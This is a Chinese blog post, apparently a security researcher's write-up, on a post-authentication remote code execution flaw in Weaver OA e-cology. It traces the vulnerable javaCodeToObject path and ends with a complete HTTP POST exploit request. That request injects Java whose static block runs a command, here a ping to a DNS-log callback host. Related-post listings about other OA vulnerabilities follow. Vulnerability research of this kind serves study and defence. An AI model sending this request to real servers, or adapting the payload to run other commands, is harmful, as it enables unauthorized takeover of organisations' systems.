泛微OA后台远程代码执行漏洞

最新推荐文章于 2025-06-09 16:16:00 发布
最新推荐文章于 2025-06-09 16:16:00 发布
阅读量753 收藏 3
点赞数 10
CC 4.0 BY-SA版权
文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_27511489/article/details/144575270

Author:Ha1ey@深蓝攻防实验室

污点函数javaCodeToObject接受var1,var2,并且经过层层调用最后实例化了传入的参数

在这里插入图片描述

溯源找到InterfaceRegisterCustomOperationCmd #excute调用了此方法

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

访问路径为 /api/integration/workflowflow/getInterfaceRegisterCustomOperation

getInterfaceRegisterCustomOperation调用了execute,首先判断了用户,所以这里是后台漏洞

在这里插入图片描述

因为我们需要这个污点函数JavaCodeToObject,所以要满足if的条件并且控制var18和var20

在这里插入图片描述

这里var14要为add

在这里插入图片描述

var14的值是从请求参数method取得,因为前面是指定POST方法所以这里method=add

在这里插入图片描述

进入if判断后var15的值如果为空就会return掉,所以这里actionid的值不为空就好,结合上面的条件就是method=add&actionid=1

在这里插入图片描述

这里var18的开头如果不是weaver.interfaces.workflow.action.javacode.Action将会进入下面的判断导致抛出异常,达不到我们想要的结果,所以这里classname=weaver.interfaces.workflow.action.javacode.Action,结合上面的参数method=add&actionid=1classname=weaver.interfaces.workflow.action.javacode.Action

在这里插入图片描述

下面var20值取自javacode参数,结合上面payload为method=add&actionid=1&classname=weaver.interfaces.workflow.action.javacode.Action&javacode=
在这里插入图片描述

if如果var18包含weaver.interfaces.workflow.action.javacode进入我们想要的javacodetoobject调用,所以classname=weaver.interfaces.workflow.action.javacode.Action.weaver.interfaces.workflow.action.javacode.Action两个条件用.连接否则会报加载异常

在这里插入图片描述

根据上面的条件都已满足var18和var20条件,构造var20的参数为 javacode=package weaver.interfaces.workflow.action.javacode.Action.weaver.interfaces.workflow.action.javacode; import java.io.IOException; public class test { static { try { Runtime.getRuntime().exec("ping xxxx"); } catch (IOException e) { e.printStackTrace(); } } }这里将命令执行的代码放在静态代码块是因为实例化的时候会自动执行static中的代码,达到命令执行

在这里插入图片描述

实际发包好像没有利用成功,回头看一下代码 发现加上这个参数 dtinfo_CustomParameterData就可以了,主要就是var18和var20两个参数,不明白为啥。最后为了保险将之前的参数也都加上了,不过有无不影响命令执行。

POST /api/integration/workflowflow/getInterfaceRegisterCustomOperation HTTP/1.1
Host: 10.10.10.149:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.33
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ecology_JSessionid=aaa8G6PRBnnBD82yi6Fky; JSESSIONID=aaa8G6PRBnnBD82yi6Fky; __randcode__=d2fa15e2-395e-4b3b-a004-82fc07c18695; loginidweaver=1; languageidweaver=7; loginuuids=1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 548

method=add&actionid=1&classname=weaver.interfaces.workflow.action.javacode.Action.weaver.interfaces.workflow.action.javacode.Test&dtinfo_CustomParameterData=11&actionname=111&oldactionid=11&id=111&javaCode=package weaver.interfaces.workflow.action.javacode.Action.weaver.interfaces.workflow.action.javacode;
import java.io.IOException;
public class Test {
    static {
        try {
            Runtime.getRuntime().exec("ping 252c2f77.dns.1433.eu.org.");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

在这里插入图片描述

本文首发先知社区:https://xz.aliyun.com/t/11947,转载请注明出处。

Ha1ey
关注
OA E-Cology /messager/users.data 信息泄漏漏洞
shelter1234567的博客
02-08 673
OA E-Cology /messager/users.data 信息泄漏漏洞OA E-Cology users.data 允许任意用户下载,获取OA中的敏感信息如账号密码。
漏洞复现】CERIO DT系列路由器 远程代码执行漏洞
qq_67810151的博客
03-13 639
CERIO DT系列路由器在特定版本中存在操作命令注入漏洞。未授权的攻击者可利用该漏洞进行远程代码执行,从而控制服务器。
OA-SQL注入漏洞
maverickpig的博客
01-23 8982
OA sql注入汇总
漏洞复现】OA E-Office do_excel.php 任意文件写入漏洞
qq_48368964的博客
10-01 1595
OAE-Ofice do exce.php 口存在任意文件写入漏洞。由于该接口未对上传文件的路径和名称进行有效校验,攻击者可以通过构造特定的请求,将任意文件写入到服务器的指定位置。攻击者利用该漏洞上传恶意文件,如 WebShel 或系统脚本,从而在服务器上执行任意命令,访问敏感数据,甚至完全接管服务器。0-0fice是一款标准化的协同 OA办公软件,协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。
护网中的漏洞(附学习教程)
最新发布
2401_85773496的博客
06-09 835
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
2021-OA V8 SQL注入漏洞
weixin_43227251的博客
04-13 1万+
OA V8 SQL注入漏洞 漏洞描述 OA V8 存在SQL注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限 漏洞影响 OA V8 FOFA app=“-协同办公OA漏洞复现 在getdata.jsp中,直接将request对象交给 weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext) : 方法处理 在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法 P
OA V8 SQL注入漏洞和文件上传漏洞
热门推荐
qq_52469895的博客
04-11 1万+
fofa语句 app="-协同办公OA" SQL注入 在OA V8中的getdata.jsp文件里,通过gatData方法将数据获取并回显在页面上,而在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法。其中它存在四个参数,分别为空字符串、cmd参数值、request对象以及serverContext对象,通过对cmd参数值进行判断,当cmd值等于getSelectAllId时,再从请求中获取sql和type两个参数值,并将参数传递进getSelectAllIds
漏洞复现】OA E-Cology ProcessOverRequestByXml文件读取漏洞
晚风不及你
05-13 1071
OA E-Cology ProcessOverRequestByXml存在任意文件读取漏洞,允许未经授权的用户读取服务器上的敏感配置文件
RCE(远程命令/代码执行漏洞)原理及复现
qq_41679358的博客
08-15 9628
本文转自行云博客https://www.xy586.top/ 作用 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 原理 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 如果,设计者在完成该功能时,没有做严格.
漏洞复现】-ecology-任意文件读取-ln.FileDownload
知黑而守白
07-15 558
协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。E-Cology接口处存在文件读取漏洞,恶意攻击者可能利用该漏洞读取服务器上的敏感文件,例如客户记录、财务数据或源代码,导致数据泄露。
Web安全-相关系统-历史漏洞
csjsz的博客
07-01 5110
2019年 e-cology OA数据库配置信息泄漏 包括不限于8.0、9.0版本 /mobile/dbconfigreader.jsp 2019年 e-cology OA系统V8、V9版本SQL注入(暂未发现公开poc) 2019年 e-cology OA系统远程代码执行 0x02 影响范围 包括但不限于7.0,8.0,8.1 /weaver/bsh.servlet.BshServlet/ CNVD-2019-34241 /mobile/browser/WorkflowCenterT
红蓝对抗重点OA系统漏洞利用工具新年贺岁版V2.0,附工具下载链接。
白帽子黑客SuperherRo
09-22 761
红蓝对抗重点OA系统漏洞利用工具新年贺岁版V2.0的设计中旨是为了帮助各位师傅在渗透测试和挖洞中以及攻防演练中能够快速对OA系统进行快速定位进行漏洞检测和利用.,目前已实现20款OA系统的漏洞检测和利用,共133个漏洞.听说day一打一个准,也欢迎各位师傅补充漏洞和反馈误报,我们将积极作出调整和完善.已实现OA:通达、、万户、致远、用友、蓝凌、极限、红帆、华天、金蝶、金和、启莱、新点、信呼、一米、致翔、智明、宏景、广联达、易宝共20款OA系统漏洞检测和利用.支持单个或批量检测利用.
漏洞复现】ecology OA系统某接口存在数据库配置信息泄露漏洞
Summer's blog
05-13 1万+
ecology OA系统某接口存在数据库配置信息泄露漏洞,复现的时候踩到的那些坑!经验分享与总结。
OA E-Office V10 OfficeServer 任意文件上传漏洞复现
故事讲予风听
10-20 3923
e-ofice是一款标准化的协同0A办公软件, E-ofice 10 0ficeServer 存在任意文件上传漏洞,攻击者可以上传任意文件,获取webshell,在服务器上执行任意命令、读取敏感信息等。
【nday】复现OA e-cology XXE 漏洞——可读取任意文件
记录并分享学习安全的知识点..
07-14 3364
e-cology是一款由网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。e-cology某处功能点最初针对用户输入的过滤不太完善,导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过,本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件,甚至可能获取应用系统的管理员权限。
漏洞预警】OA WorkflowCenterTreeData接口注入漏洞(限oracle数据库)
Summer's blog
05-13 7705
目录 0x01 漏洞描述 0x02 漏洞威胁等级 0x03 漏洞成因 0x04 漏洞复现 0x05 修复建议 0x06 免责申明 0x01 漏洞描述 e-cology OA系统的WorkflowCenterTreeData接口在使用oracle数据库时,由于内置sql语句拼接不严,导致其存在sql注入漏洞 0x02 漏洞威胁等级 高危 影响范围 所有使用Oracle数据库的服务...
【复现】-EOfficeOA信息泄露漏洞_41
fushuang333的博客
02-06 1390
【复现】-EOfficeOA信息泄露漏洞,未授权导致一些敏感配置信息泄露,可能造成系统危害以及重要信息泄露。
E-Cology getFileViewUrl SSRF漏洞复现
0xSec
07-09 2666
E-Cology getFileViewUrl 接口处存在服务器请求伪造漏洞,未经身份验证的远程攻击者利用此漏洞扫描服务器所在的内网或本地端口,获取服务的banner信息,窥探网络结构,甚至对内网或本地运行的应用程序发起攻击,获取服务器内部敏感配置,造成信息泄露。
最新漏洞汇总----实时更新!!!
yggcwhat
07-31 1万+
最新漏洞汇总
OA系统远程代码执行漏洞(CNVD-2019-32204)的风险评估和修复步骤是什么?
11-01
OA系统中的远程代码执行漏洞(CNVD-2019-32204)对企业的安全构成了极大威胁。为了进行风险评估和修复,首先需要了解该漏洞的工作原理及影响范围。该漏洞主要影响OA的7.0/8.0/8.1/9.0版本,攻击者可通过特定的网络请求,利用系统的漏洞执行未经授权的代码,获得系统的控制权。接下来,进行风险评估时需要分析系统是否有未授权的外部访问、服务器的网络安全措施以及系统的监控机制等。确定风险等级后,应立即采取以下步骤进行修复:(详细步骤、修复示例、可能需要的技术工具和方法、扩展内容等,此处略) 参考资源链接:[与致远OA系统安全漏洞深度剖析:关键风险点与修复建议](https://wenku.youkuaiyun.com/doc/502pmk5iub?spm=1055.2569.3001.10343) 修复后,应确保漏洞已被完全封堵,并对系统进行彻底的安全测试,以验证修复措施的有效性。为了防范未来可能出现的类似漏洞,建议定期进行系统的安全扫描和漏洞评估。进一步深入学习如何防范远程代码执行漏洞及其他相关安全风险,建议参阅《与致远OA系统安全漏洞深度剖析:关键风险点与修复建议》,该文档详细介绍了和致远OA系统中的多个安全漏洞及其修复策略,对于IT专业人员来说,是理解并防御这些漏洞的重要参考资源。 参考资源链接:[与致远OA系统安全漏洞深度剖析:关键风险点与修复建议](https://wenku.youkuaiyun.com/doc/502pmk5iub?spm=1055.2569.3001.10343)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值